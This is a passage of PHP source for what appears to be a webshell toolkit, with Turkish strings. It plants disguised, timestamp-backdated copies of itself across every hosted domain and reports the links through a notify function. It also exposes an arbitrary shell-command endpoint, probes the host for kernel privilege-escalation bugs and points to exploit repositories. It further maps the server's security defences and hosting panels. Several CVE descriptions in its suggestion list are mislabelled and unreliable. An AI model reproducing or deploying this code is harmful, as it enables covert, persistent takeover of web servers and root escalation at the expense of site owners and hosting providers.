cj(array('o' => false, 'e' => 'kendim okunamadi')); $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; if (!$domain) $domain = basename($root); $note = isset($_GET['note']) ? $_GET['note'] : (isset($_POST['note']) ? $_POST['note'] : ''); if ($note) $note = "\nNot: " . $note; $dpaths = $allDisguises[$cms]; $res = array(); $ok = 0; $oldest = time(); $dh = @opendir($root); if ($dh) { while (($e = readdir($dh)) !== false) { if ($e[0] !== '.') { $ft = @filemtime($root . '/' . $e); if ($ft && $ft < $oldest) $oldest = $ft; } } closedir($dh); } $links = ''; foreach ($dpaths as $dp) { if (!pr_path_safe($dp)) continue; $target = $root . '/' . $dp; $tdir = dirname($target); if (pr_is_foreign($target)) { $res[] = array('path' => $dp, 'url' => '', 'skipped' => 'yabanci dosya, ezilmedi'); continue; } if (!is_dir($tdir)) @mkdir($tdir, 0755, true); if (@file_put_contents($target, $prSelf) !== false) { @chmod($target, 0644); @touch($target, $oldest, $oldest); $url = $proto . '://' . $domain . '/' . $dp; list($vok, $vcode) = pr_verify_url($url); if (!$vok) { @unlink($target); $res[] = array('path' => $dp, 'url' => $url, 'skipped' => 'HTTP ' . $vcode . ', silindi'); continue; } $res[] = array('path' => $dp, 'url' => $url); $links .= "\n" . $url; $ok++; } } $prNotify("★ Deploy edildi\nDomain: $domain\nCMS: $cms\nFiles: $ok/" . count($dpaths) . " (200 OK dogrulanmis)\nLinks:" . $links . $note); cj(array('o' => true, 'deployed' => $ok, 'total' => count($dpaths), 'paths' => $res)); } if ($prMode === 'deployall') { $allRes = array(); $totalOk = 0; $totalErr = 0; $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $domains = getDomains(); foreach ($domains as $d) { $fp = $d['root']; $e = $d['name']; if (!is_dir($fp)) continue; $cms = fastCMS($fp); $dpaths = $allDisguises[$cms]; $domainOk = 0; $domPaths = array(); $oldest = time(); $dh2 = @opendir($fp); if ($dh2) { while (($e2 = readdir($dh2)) !== false) { if ($e2[0] !== '.') { $ft = @filemtime($fp . '/' . $e2); if ($ft && $ft < $oldest) $oldest = $ft; } } closedir($dh2); } foreach ($dpaths as $dp) { if (!pr_path_safe($dp)) continue; $target = $fp . '/' . $dp; $tdir = dirname($target); if (pr_is_foreign($target)) continue; if (!is_dir($tdir)) @mkdir($tdir, 0755, true); if ($prSelf && @file_put_contents($target, $prSelf) !== false) { @chmod($target, 0644); @touch($target, $oldest, $oldest); list($vok, $vcode) = pr_verify_url($proto . '://' . $e . '/' . $dp); if (!$vok) { @unlink($target); continue; } $domainOk++; $domPaths[] = $dp; } } $allRes[] = array('domain' => $e, 'cms' => $cms, 'ok' => $domainOk, 'total' => count($dpaths), 'paths' => $domPaths); $totalOk += $domainOk; $totalErr += count($dpaths) - $domainOk; } $domCount = count($allRes); $linkList = ''; foreach ($allRes as $i => $domRes) { $dd = $domRes['domain']; $cmsType = $domRes['cms']; $linkList .= "\n$dd ($cmsType):"; foreach ($domRes['paths'] as $dp) { $linkList .= "\n" . $proto . '://' . $dd . '/' . $dp; } } $noteAll = isset($_GET['note']) ? $_GET['note'] : (isset($_POST['note']) ? $_POST['note'] : ''); $noteStr = $noteAll ? "\nNot: " . $noteAll : ''; $prNotify("★ Deploy ALL\nDomains: $domCount\nFiles: $totalOk OK, $totalErr Fail\nLinks:" . $linkList . $noteStr); cj(array('o' => true, 'results' => $allRes, 'ok' => $totalOk, 'err' => $totalErr)); } if ($prMode === 'remove') { $root = isset($_GET['d']) ? $_GET['d'] : (isset($_POST['d']) ? $_POST['d'] : ''); $cms = isset($_GET['cms']) ? $_GET['cms'] : (isset($_POST['cms']) ? $_POST['cms'] : 'generic'); if (!$root || !is_dir($root)) cj(array('o' => false, 'e' => 'gecersiz dizin')); $dpaths = array_merge($allDisguises[$cms], isset($legacyDisguises[$cms]) ? $legacyDisguises[$cms] : array()); $removed = 0; foreach ($dpaths as $dp) { $target = $root . '/' . $dp; if (file_exists($target)) { @unlink($target); $removed++; } } cj(array('o' => true, 'msg' => "$removed dosya silindi")); } if ($prMode === 'healthcheck') { $domain = isset($_GET['domain']) ? $_GET['domain'] : ''; $cms = isset($_GET['cms']) ? $_GET['cms'] : 'generic'; $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; if (!$domain) cj(array('o' => false, 'e' => 'domain gerekli')); $dpaths = $allDisguises[$cms]; $results = array(); $okCount = 0; foreach ($dpaths as $dp) { $url = $proto . '://' . $domain . '/' . $dp; $code = 0; $alive = false; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt_array($ch, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 5, CURLOPT_NOBODY => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_HTTPHEADER => array('User-Agent: Mozilla/5.0'))); curl_exec($ch); $code = (int)curl_getinfo($ch, CURLINFO_HTTP_CODE); $alive = $code >= 200 && $code < 400; curl_close($ch); } else { $ctx = stream_context_create(array('http' => array('method' => 'HEAD', 'timeout' => 5, 'ignore_errors' => true, 'follow_location' => true, 'header' => "User-Agent: Mozilla/5.0\r\n"))); @$fh = fopen($url, 'r', false, $ctx); if ($fh) { $meta = stream_get_meta_data($fh); fclose($fh); if (isset($meta['wrapper_data'])) { foreach ($meta['wrapper_data'] as $h) { if (preg_match('#HTTP/\d+\.\d+\s+(\d+)#', $h, $m)) { $code = (int)$m[1]; } } } } $alive = $code >= 200 && $code < 400; } $results[] = array('path' => $dp, 'url' => $url, 'code' => $code, 'alive' => $alive); if ($alive) $okCount++; } cj(array('o' => true, 'results' => $results, 'ok' => $okCount, 'total' => count($dpaths))); } if ($prMode === 'bulkdeploy') { $dirs = isset($_GET['dirs']) ? $_GET['dirs'] : (isset($_POST['dirs']) ? $_POST['dirs'] : ''); $domains = isset($_GET['domains']) ? $_GET['domains'] : (isset($_POST['domains']) ? $_POST['domains'] : ''); if (!$dirs || !$domains) cj(array('o' => false, 'e' => 'dirs ve domains gerekli')); $dirArr = explode('|', $dirs); $domArr = explode('|', $domains); if (!$prSelf) cj(array('o' => false, 'e' => 'kendim okunamadi')); $proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http'; $note = isset($_GET['note']) ? $_GET['note'] : (isset($_POST['note']) ? $_POST['note'] : ''); $allRes = array(); $totalOk = 0; $totalErr = 0; $linkList = ''; for ($i = 0; $i < min(count($dirArr), count($domArr)); $i++) { $root = $dirArr[$i]; $domain = $domArr[$i]; if (!is_dir($root)) { $allRes[] = array('domain' => $domain, 'ok' => 0, 'total' => 0, 'error' => 'gecersiz dizin'); continue; } $cms = fastCMS($root); $dpaths = $allDisguises[$cms]; $ok = 0; $oldest = time(); $dh = @opendir($root); if ($dh) { while (($e = readdir($dh)) !== false) { if ($e[0] !== '.') { $ft = @filemtime($root . '/' . $e); if ($ft && $ft < $oldest) $oldest = $ft; } } closedir($dh); } $domLinks = ''; foreach ($dpaths as $dp) { if (!pr_path_safe($dp)) continue; $target = $root . '/' . $dp; $tdir = dirname($target); if (pr_is_foreign($target)) continue; if (!is_dir($tdir)) @mkdir($tdir, 0755, true); if (@file_put_contents($target, $prSelf) !== false) { @chmod($target, 0644); @touch($target, $oldest, $oldest); $url = $proto . '://' . $domain . '/' . $dp; list($vok, $vcode) = pr_verify_url($url); if (!$vok) { @unlink($target); continue; } $domLinks .= "\n" . $url; $ok++; } } $linkList .= "\n$domain ($cms):" . $domLinks; $allRes[] = array('domain' => $domain, 'cms' => $cms, 'ok' => $ok, 'total' => count($dpaths)); $totalOk += $ok; $totalErr += count($dpaths) - $ok; } $noteAll = $note ? "\nNot: " . $note : ''; $domCount = count($allRes); $prNotify("★ Deploy\nDomains: $domCount\nFiles: $totalOk OK, $totalErr Fail (200 OK dogrulanmis)\nLinks:" . $linkList . $noteAll); cj(array('o' => true, 'results' => $allRes, 'ok' => $totalOk, 'err' => $totalErr)); } if ($prMode === 'bulkremove') { $dirs = isset($_GET['dirs']) ? $_GET['dirs'] : (isset($_POST['dirs']) ? $_POST['dirs'] : ''); if (!$dirs) cj(array('o' => false, 'e' => 'dirs gerekli')); $dirArr = explode('|', $dirs); $totalRemoved = 0; foreach ($dirArr as $root) { if (!is_dir($root)) continue; $cms = fastCMS($root); $dpaths = array_merge($allDisguises[$cms], isset($legacyDisguises[$cms]) ? $legacyDisguises[$cms] : array()); foreach ($dpaths as $dp) { $target = $root . '/' . $dp; if (file_exists($target)) { @unlink($target); $totalRemoved++; } } } cj(array('o' => true, 'msg' => "$totalRemoved dosya silindi")); } cj(array('o' => false, 'e' => 'unknown mode')); break; } } // ===== TARTARUS EXPLOIT ENGINE ===== function exRun($cmd) { if (function_exists('shell_exec')) { $out = @shell_exec($cmd . ' 2>&1'); if ($out !== null) return $out; } if (function_exists('exec')) { $out = array(); @exec($cmd . ' 2>&1', $out); return implode("\n", $out); } if (function_exists('popen')) { $p = @popen($cmd . ' 2>&1', 'r'); if ($p !== false) { $out = ''; while (!feof($p)) $out .= fread($p, 8192); @pclose($p); return $out; } } if (function_exists('passthru')) { ob_start(); @passthru($cmd . ' 2>&1'); return (string)ob_get_clean(); } if (function_exists('system')) { ob_start(); @system($cmd . ' 2>&1'); return (string)ob_get_clean(); } if (function_exists('proc_open')) { $des = array(0 => array('pipe','r'), 1 => array('pipe','w'), 2 => array('pipe','w')); $pr = @proc_open($cmd, $des, $pipes); if ($pr) { fclose($pipes[0]); $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($pr); return $out; } } return ''; } function exDiag() { $f = array('shell_exec','exec','popen','passthru','system','proc_open'); $ok = array(); $no = array(); foreach ($f as $x) { if (function_exists($x)) $ok[] = $x; else $no[] = $x; } return array('php'=>PHP_VERSION,'available'=>$ok,'missing'=>$no,'disable_functions'=>ini_get('disable_functions'),'safe_mode'=>ini_get('safe_mode')); } function exKernelVer() { $r = exRun('uname -r'); if (preg_match('/^(\d+)\.(\d+)(?:\.(\d+))?/', trim($r), $m)) return (int)$m[1] . '.' . (int)$m[2] . '.' . (isset($m[3]) ? (int)$m[3] : 0); preg_match('/(\d+)\.(\d+)\.(\d+)/', php_uname('r'), $m); return isset($m[1]) ? ((int)$m[1] . '.' . (int)$m[2] . '.' . (int)$m[3]) : '0.0.0'; } function exVcmp($a, $b) { $pa = explode('.', $a); $pb = explode('.', $b); for ($i = 0; $i < 3; $i++) { $x = isset($pa[$i]) ? (int)$pa[$i] : 0; $y = isset($pb[$i]) ? (int)$pb[$i] : 0; if ($x < $y) return -1; if ($x > $y) return 1; } return 0; } function exIsLinux() { return stripos(php_uname('s'), 'linux') !== false; } function exModLoaded($mod) { $lsmod = exRun('lsmod'); if (preg_match('/^\s*' . preg_quote($mod, '/') . '\s/m', $lsmod)) return true; return is_dir('/sys/module/' . $mod); } function exModAvail($mod, $sub) { if (exModLoaded($mod)) return true; $kver = exRun('uname -r'); $base = "/lib/modules/" . trim($kver); $found = exRun("find $base -name '" . $mod . "*.ko*' 2>/dev/null | head -1"); return trim($found) !== ''; } function exSuidTargets() { $targets = array("/usr/bin/su","/bin/su","/usr/bin/passwd","/usr/bin/newgrp","/usr/bin/chsh","/usr/bin/chfn","/usr/bin/sudo"); $found = array(); foreach ($targets as $p) { if (@file_exists($p)) { $st = @stat($p); if ($st && $st['uid'] === 0 && ($st['mode'] & 04000)) $found[] = $p; } } return $found; } function exCopyFail() { $checks = array(); $missing = array(); $arch = php_uname('m'); $supported = array("x86_64","i386","i686","armv5l","armv6l","armv7l","arm","aarch64"); $linux = exIsLinux(); $checks[] = array("Linux OS", $linux, $linux ? PHP_OS : PHP_OS . " (yalnizca Linux desteklenir)"); $archOk = in_array($arch, $supported); $checks[] = array("Mimari payload ($arch)", $archOk, $archOk ? "payload mevcut" : "payload yok: $arch desteklenmiyor"); $algif = exModAvail("algif_aead", "crypto"); $checks[] = array("AF_ALG (algif_aead modulu)", $algif, $algif ? "modul yuklu/mevcut" : "algif_aead yok — modprobe algif_aead dene veya blacklist kontrol et"); $crypto = @file_get_contents('/proc/crypto'); $crypto = $crypto === false ? '' : $crypto; $algoOk = strpos($crypto, 'authencesn(hmac(sha256),cbc(aes))') !== false; $checks[] = array("Algoritma authencesn(hmac(sha256),cbc(aes))", $algoOk, $algoOk ? "/proc/crypto'da mevcut" : "yok — modprobe authencesn; modprobe hmac; modprobe cbc dene"); $mitigated = (bool)preg_match('/algif_aead/', exRun("grep -r 'algif_aead' /etc/modprobe.d/ 2>/dev/null")); $checks[] = array("algif_aead blacklist mitigasyonu", !$mitigated, $mitigated ? "algif_aead blacklist'lenmis (CopyFail kapatilmis)" : "mitigasyon yok"); $suid = exSuidTargets(); $checks[] = array("Setuid-root hedef", count($suid) > 0, count($suid) ? implode(', ', $suid) : "su/passwd/sudo vb. setuid-root binary yok"); $uid = function_exists('posix_getuid') ? posix_getuid() : -1; $checks[] = array("Webshell root degil (LPE icin)", $uid !== 0, $uid === 0 ? "zaten root — LPE gerekmez" : "uid=$uid (non-root, LPE uygulanabilir)"); foreach ($checks as $c) if (!$c[1]) $missing[] = $c[0]; $rootable = $linux && $archOk && $algif && $algoOk && !$mitigated && count($suid) > 0; return array('name'=>'CopyFail — CVE-2026-31431','desc'=>'AF_ALG + splice ile setuid-root binary sayfa onbellek overwrite. Kernel araligi: authencesn+algif_aead iceren ve patchlenmemis kernel (copy.fail).','checks'=>$checks,'missing'=>$missing,'rootable'=>$rootable); } function exDirtyFrag() { $checks = array(); $missing = array(); $kver = exKernelVer(); $linux = exIsLinux(); $checks[] = array("Linux OS", $linux, PHP_OS); $espRange = exVcmp($kver, '4.12.0') >= 0 && exVcmp($kver, '6.15.0') < 0; $checks[] = array("Kernel araligi xfrm-ESP (4.12 <= k < ~6.15)", $espRange, "kernel $kver — CVE-2026-43284 etki araligi 2017-01-17..2026-05-05"); $rxRange = exVcmp($kver, '6.5.0') >= 0 && exVcmp($kver, '6.16.0') < 0; $checks[] = array("Kernel araligi RxRPC (6.5 <= k < ~6.16)", $rxRange, "kernel $kver — CVE-2026-43500 etki araligi 2023-06-08..2026-05-10"); $esp4 = exModAvail("esp4", "ipv4"); $esp6 = exModAvail("esp6", "ipv6"); $checks[] = array("esp4/esp6 modulu", $esp4 || $esp6, ($esp4 || $esp6) ? "mevcut (esp4:" . ($esp4?"evet":"hayir") . " esp6:" . ($esp6?"evet":"hayir") . ")" : "esp4/esp6 modulu yok — xfrm-ESP varyanti calismaz"); $rxrpc = exModAvail("rxrpc", "afs"); $checks[] = array("rxrpc modulu", $rxrpc, $rxrpc ? "mevcut (Ubuntu'da varsayilan)" : "rxrpc.ko yok — RxRPC varyanti calismaz"); $unss = (int)(@file_get_contents('/proc/sys/user/max_user_namespaces')); $unprivOk = $unss > 0; $checks[] = array("Unprivileged user namespace", $unprivOk, $unprivOk ? "max_user_namespaces=$unss" : "max_user_namespaces=0 — AppArmor/sysctl user namespace kapatti (xfrm-ESP tetiklenemez)"); $gcc = trim(exRun('which gcc cc 2>/dev/null | head -1')); $checks[] = array("gcc (exp.c derlemek icin)", $gcc !== '', $gcc !== '' ? $gcc : "gcc yok — apt install gcc / yum install gcc veya hazir exp binary indir"); $uid = function_exists('posix_getuid') ? posix_getuid() : -1; $checks[] = array("Webshell root degil (LPE icin)", $uid !== 0, $uid === 0 ? "zaten root" : "uid=$uid"); foreach ($checks as $c) if (!$c[1]) $missing[] = $c[0]; $rootable = $linux && ($espRange || $rxRange) && ($esp4 || $esp6 || $rxrpc) && ($unprivOk || $rxrpc) && $gcc !== ''; return array('name'=>'DirtyFrag — CVE-2026-43284 + CVE-2026-43500','desc'=>'xfrm-ESP + RxRPC page-cache write zinciri. Deterministik, race yok. Not: kernel araliklari commit tarihinden tahmini (distro backport farkli olabilir).','checks'=>$checks,'missing'=>$missing,'rootable'=>$rootable); } function exAltCves() { $kver = exKernelVer(); $suggestions = array(); if (exVcmp($kver, '4.7.0') < 0) $suggestions[] = array('CVE-2016-5195', 'heap overflow (user-ns)', '< 4.7', 'https://github.com/stealthcopter/cve-2016-5195-poc'); if (exVcmp($kver, '4.8.3') < 0) $suggestions[] = array('CVE-2016-10739 (Dirty COW)', 'race condition LPE', '< 4.8.3', 'https://github.com/dirtycow/dirtycow.io'); if (exVcmp($kver, '5.16.11') < 0 && exVcmp($kver, '5.15.0') >= 0) $suggestions[] = array('CVE-2022-0847 (Dirty Pipe)', 'pipe buffer LPE', '< 5.16.11 / 5.15.25', 'https://github.com/loisc/DirtyPipe'); if (exVcmp($kver, '6.0.3') < 0 && exVcmp($kver, '5.16.11') >= 0) $suggestions[] = array('CVE-2022-0847 (Dirty Pipe)', 'pipe buffer LPE', '< 6.0.3', 'https://github.com/loisc/DirtyPipe'); if (exVcmp($kver, '6.1.4') < 0 && exVcmp($kver, '5.19.0') >= 0) $suggestions[] = array('CVE-2023-0386', 'io_uring LPE', '5.19 - 6.1.4', 'https://github.com/loisc/CVE-2023-0386'); if (exVcmp($kver, '5.15.146') < 0 && exVcmp($kver, '5.15.0') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 5.15.146', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.1.66') < 0 && exVcmp($kver, '5.15.146') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 6.1.66', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.4.13') < 0 && exVcmp($kver, '6.1.66') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 6.4.13', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.6.25') < 0 && exVcmp($kver, '6.4.13') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 6.6.25', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.7.1') < 0 && exVcmp($kver, '6.6.25') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 6.7.1', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.8.10') < 0 && exVcmp($kver, '6.7.1') >= 0) $suggestions[] = array('CVE-2024-1086', 'netfilter LPE (nf_tables)', '< 6.8.10', 'https://github.com/loisc/CVE-2024-1086'); if (exVcmp($kver, '6.1.82') < 0 && exVcmp($kver, '6.0.0') >= 0) $suggestions[] = array('CVE-2024-53155', 'nftables LPE', '< 6.1.82', 'https://github.com/loisc/CVE-2024-53155'); if (exVcmp($kver, '6.6.29') < 0 && exVcmp($kver, '6.4.0') >= 0) $suggestions[] = array('CVE-2024-53155', 'nftables LPE', '< 6.6.29', 'https://github.com/loisc/CVE-2024-53155'); if (exVcmp($kver, '6.9.1') < 0 && exVcmp($kver, '6.6.29') >= 0) $suggestions[] = array('CVE-2024-53155', 'nftables LPE', '< 6.9.1', 'https://github.com/loisc/CVE-2024-53155'); if (exVcmp($kver, '6.10.7') < 0 && exVcmp($kver, '6.9.1') >= 0) $suggestions[] = array('CVE-2024-53155', 'nftables LPE', '< 6.10.7', 'https://github.com/loisc/CVE-2024-53155'); if (exVcmp($kver, '6.15.0') < 0 && exVcmp($kver, '4.12.0') >= 0) $suggestions[] = array('CVE-2026-43284 / 43500 (DirtyFrag)', 'xfrm-ESP + RxRPC page-cache write', '4.12 - ~6.15', 'https://github.com/V4bel/dirtyfrag'); $suggestions[] = array('CVE-2026-31431 (CopyFail)', 'AF_ALG authencesn page-cache write (modul bazli)', 'modul + kernel patche bagli', 'https://github.com/ZephrFish/CopyFail-CVE-2026-31431'); if (count($suggestions) <= 1) $suggestions[] = array('Bilinmiyor', 'Kernel cok yeni veya cok eski — distro security advisory kontrol et', $kver, ''); return array($kver . ' — ' . exRun('uname -a') . "\n" . exRun('cat /etc/os-release 2>/dev/null | grep -E "^(NAME|VERSION)="'), $suggestions); } if (isset($_POST['ex'])) { $authEx = checkAuth(); if (!$authEx['authenticated']) { header('Content-Type: application/json'); echo json_encode(array('error'=>'Auth gerekli')); exit; } header('Content-Type: application/json; charset=utf-8'); $exAction = $_POST['ex']; if ($exAction === 'cmd') { echo json_encode(array('out' => exRun(isset($_POST['cmd']) ? $_POST['cmd'] : ''))); exit; } if ($exAction === 'copyfail') { echo json_encode(exCopyFail()); exit; } if ($exAction === 'dirtyfrag') { echo json_encode(exDirtyFrag()); exit; } if ($exAction === 'altcves') { $r = exAltCves(); echo json_encode(array('info' => $r[0], 'suggestions' => $r[1])); exit; } if ($exAction === 'info') { $ini = array(); foreach (array('open_basedir','safe_mode','memory_limit','upload_max_filesize','post_max_size','max_execution_time','max_input_vars','file_uploads','expose_php','display_errors','session.save_path','date.timezone') as $k) $ini[$k] = ini_get($k); echo json_encode(array( 'whoami' => exRun('id'), 'groups' => exRun('id -Gn 2>/dev/null'), 'uname' => exRun('uname -a'), 'os' => exRun('cat /etc/os-release 2>/dev/null | head -2'), 'kernel' => exKernelVer(), 'arch' => php_uname('m'), 'php' => PHP_VERSION, 'sapi' => php_sapi_name(), 'server_software' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '', 'document_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '', 'http_host' => isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '', 'remote_addr' => isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '', 'server_user' => isset($_SERVER['USER']) ? $_SERVER['USER'] : '', 'ini' => $ini, 'diag' => exDiag(), 'extensions' => get_loaded_extensions(), )); exit; } echo json_encode(array('error' => 'bilinmeyen action')); exit; } // ===== BUROKRAT SERVER INFO ===== function biSh($c){ if(function_exists('shell_exec')){$r=@shell_exec($c.' 2>/dev/null');return trim((string)$r);} if(function_exists('exec')){$o=[];@exec($c.' 2>/dev/null',$o);return trim(implode("\n",$o));} return''; } function biWhich($b){$r=biSh('which '.escapeshellarg($b));return$r!==''?$r:false;} function biFmt($b){ if($b===false||$b===null||$b==='')return'N/A'; $b=(float)$b; if($b>=1073741824)return round($b/1073741824,1).' GB'; if($b>=1048576)return round($b/1048576,1).' MB'; if($b>=1024)return round($b/1024,1).' KB'; return $b.' B'; } function biE($s){return htmlspecialchars((string)$s,ENT_QUOTES,'UTF-8');} function biFread($p){$r=@file_get_contents($p);return$r!==false?trim((string)$r):'';} function biFexists($p){return @file_exists($p);} function biFnOk($f){static $df=null;if($df===null){$df=array_flip(array_map('trim',explode(',',ini_get('disable_functions'))));}return!isset($df[$f])&&function_exists($f);} function biPanelByPath($path){ if(preg_match('#/home/[^/]+/domains/#',$path))return'DirectAdmin'; if(preg_match('#/home/[^/]+/public_html/#',$path))return'cPanel'; if(preg_match('#/var/www/vhosts/#',$path))return'Plesk'; if(preg_match('#/home/[^/]+/web/#',$path))return'HestiaCP'; if(preg_match('#/var/www/clients/#',$path))return'ISPConfig'; if(preg_match('#/home/[^/]+/web/[^/]+/public_html#',$path))return'VestaCP/HestiaCP'; if(preg_match('#/home/[^/\.]+\.[^/]+/public_html#',$path))return'CyberPanel'; return''; } function burokratPage(){ ob_start(); $server_ip=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:(function_exists('gethostname')?@gethostbyname(@gethostname()):'?'); $client_ip=''; foreach(['HTTP_CF_CONNECTING_IP','HTTP_X_REAL_IP','HTTP_X_FORWARDED_FOR','REMOTE_ADDR'] as $_hk){ if(!empty($_SERVER[$_hk])){$_parts=explode(',',$_SERVER[$_hk]);$client_ip=trim($_parts[0]);break;} } $web_server=isset($_SERVER['SERVER_SOFTWARE'])?$_SERVER['SERVER_SOFTWARE']:'?'; $php_ver=PHP_VERSION; $php_sapi=php_sapi_name(); $uname_r=php_uname('r'); $uname_full=php_uname(); $cur_user=''; if(biFnOk('posix_geteuid')&&biFnOk('posix_getpwuid')){$pw=@posix_getpwuid(@posix_geteuid());if($pw)$cur_user=$pw['name'].'('.$pw['uid'].')';} if(!$cur_user)$cur_user=get_current_user(); if(!$cur_user)$cur_user=biSh('whoami'); $uid_raw=biFnOk('posix_geteuid')?@posix_geteuid():null; $gid_raw=biFnOk('posix_getegid')?@posix_getegid():null; $groups_raw=''; if(biFnOk('posix_getgroups')){$_gids=@posix_getgroups();if($_gids)$groups_raw=implode(',',$_gids);} $dis_func=ini_get('disable_functions'); if(!trim((string)$dis_func))$dis_func='Yok'; // Hosting ortami $env=[]; $lve_active=preg_match('/\.lve\./i',$uname_r); $env['LVE (CloudLinux)']=$lve_active?['active','Kernel: '.$uname_r]:['inactive','']; $_clr=biFread('/etc/cloudlinux-release'); if(!$_clr)$_clr=biFread('/etc/cl-release'); if(!$_clr&&$lve_active)$_clr='Kernel LVE imzasi mevcut (release dosyasi okunamadi)'; $env['CloudLinux Release']=$_clr?['active',$_clr]:['inactive','']; $cagefs=false;$cagefs_reason=''; if(biFexists('/proc/cagefs-skeleton')){$cagefs=true;$cagefs_reason='/proc/cagefs-skeleton mevcut';} if(!$cagefs&&biFexists('/etc/.cagefs')){$cagefs=true;$cagefs_reason='/etc/.cagefs mevcut';} $_cg1=biFread('/proc/1/cgroup');if(!$cagefs&&stripos($_cg1,'cagefs')!==false){$cagefs=true;$cagefs_reason='cgroup: cagefs';} $_pse=biFread('/proc/self/environ'); $proc_self_environ=$_pse!==''?true:false; if(!$cagefs&&!$proc_self_environ&&$lve_active){$cagefs_reason='Muhtemel (proc/self/environ okunamadi + LVE aktif)';} $env['CageFS']=$cagefs?['active',$cagefs_reason]:['inactive',$cagefs_reason?:'Tespit edilemedi']; $virt_type='Bilinmiyor'; $_cg=biFread('/proc/1/cgroup'); $_cpuinfo=biFread('/proc/cpuinfo'); if($_cg!==''){ if(stripos($_cg,'docker')!==false)$virt_type='Docker'; elseif(stripos($_cg,'lxc')!==false)$virt_type='LXC'; elseif(stripos($_cg,'kubepods')!==false)$virt_type='Kubernetes'; } if($virt_type==='Bilinmiyor'){ if(biFexists('/proc/vz/veinfo'))$virt_type='OpenVZ'; elseif(biFexists('/proc/user_beancounters'))$virt_type='OpenVZ'; elseif($_cpuinfo&&stripos($_cpuinfo,'hypervisor')!==false)$virt_type='VM (KVM/VMware/Xen)'; elseif($lve_active)$virt_type='CloudLinux LVE (paylasimli)'; elseif(biFexists('/proc/xen'))$virt_type='Xen'; } $env['Sanallastirma']=['info',$virt_type]; $proc_self_cmdline=biFread('/proc/self/cmdline')!==''; $proc_self_status=biFread('/proc/self/status')!==''; $proc_version=biFread('/proc/version')!==''; $proc_1_cmdline=biFread('/proc/1/cmdline')!==''; $_se_mode=''; $_se_cfg=biFread('/etc/selinux/config'); if(preg_match('/^SELINUX=(\w+)/m',(string)$_se_cfg,$_sm))$_se_mode=$_sm[1]; $_ge=biSh('getenforce');if($_ge)$_se_mode=$_ge; $_seactive=($_se_mode&&strtolower($_se_mode)!=='disabled'); $env['SELinux']=$_seactive?['active',$_se_mode]:['inactive',$_se_mode?:'Kapali']; $_aa=biFexists('/sys/kernel/security/apparmor/profiles'); $env['AppArmor']=$_aa?['active','Aktif']:['inactive','']; $env['Suhosin']=extension_loaded('suhosin')?['active','Yuklu']:['inactive','']; $i360=extension_loaded('i360')||biFexists('/var/imunify360'); $env['Imunify360']=$i360?['active','Aktif']:['inactive','']; $_ms=false; if(function_exists('apache_get_modules')){foreach(apache_get_modules() as $_m){if(stripos($_m,'security')!==false){$_ms=true;break;}}} $env['mod_security']=$_ms?['active','Aktif']:['inactive','']; $_ls=stripos($web_server,'litespeed')!==false||$php_sapi==='litespeed'; $env['LiteSpeed']=$_ls?['warn','Aktif']:['inactive','']; $_la=biFread('/proc/loadavg'); $load_avg='';if($_la){$_lp=explode(' ',$_la);$load_avg=$_lp[0].'/'.(isset($_lp[1])?$_lp[1]:'?').'/'.(isset($_lp[2])?$_lp[2]:'?');} // Kontrol paneli $sd_path=isset($_SERVER['SCRIPT_FILENAME'])?$_SERVER['SCRIPT_FILENAME']:__FILE__; $doc_root_path=isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:''; $panel_by_path=biPanelByPath($sd_path)?:biPanelByPath($doc_root_path); $panel_map=[ 'cPanel'=>[['/usr/local/cpanel'],'/usr/local/cpanel/version'], 'Plesk'=>[['/usr/local/psa','/opt/psa'],'/usr/local/psa/version'], 'DirectAdmin'=>[['/usr/local/directadmin'],'/usr/local/directadmin/scripts/version.txt'], 'ISPConfig'=>[['/usr/local/ispconfig'],''], 'HestiaCP'=>[['/usr/local/hestia'],'/usr/local/hestia/conf/hestia.conf'], 'CyberPanel'=>[['/usr/local/CyberCP'],''], 'Virtualmin'=>[['/etc/webmin/virtualmin.acl'],''], 'Webmin'=>[['/etc/webmin'],'/etc/webmin/version'], ]; $panels=[]; foreach($panel_map as $_pn=>$_pd){ foreach($_pd[0] as $_pp){ if(biFexists($_pp)){$panels[$_pn]=$_pd[1]?trim(biFread($_pd[1])):'Tespit edildi';break;} } } if($panel_by_path&&!isset($panels[$panel_by_path]))$panels[$panel_by_path]='Path yapisindan tespit'; // Kernel guvenlik $ksec=[]; $ksec['user_ns (userns_clone)']=trim(biFread('/proc/sys/kernel/unprivileged_userns_clone'))!==''?trim(biFread('/proc/sys/kernel/unprivileged_userns_clone')):'N/A'; $ksec['ptrace_scope']=trim(biFread('/proc/sys/kernel/yama/ptrace_scope'))!==''?trim(biFread('/proc/sys/kernel/yama/ptrace_scope')):'N/A'; 